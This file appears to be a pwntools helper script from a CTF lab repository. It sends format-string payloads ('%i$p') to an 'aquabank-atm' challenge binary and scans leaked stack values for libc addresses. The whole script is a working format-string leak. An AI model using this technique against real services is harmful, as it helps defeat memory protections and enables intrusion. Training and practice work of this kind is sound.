OffSec-CTF/lab3_4_recap/02_aquabank_atm/find_libc.py

from pwn import *

context.binary = elf = ELF("./aquabank-atm_patched", checksec=False)
p = process(elf.path)
# p = remote("offsec.m0lecon.it", 13523)
print(p.recvuntil(b"> "))
for i in range(1, 400):
    p.sendline(b"1")
    p.recvuntil(b"Type your customer note: ")
    payload = f"%{i}$p"
    p.sendline(payload.encode())
    p.recvuntil(b"> ")
    p.sendline(b"2")
    p.recvuntil(b"--- Your customer note ---\n")
    addr = p.recvline()
    if b"0x7f" in addr:
        print(f"Address:{addr} at pos:{i}")
    p.recvuntil(b"> ")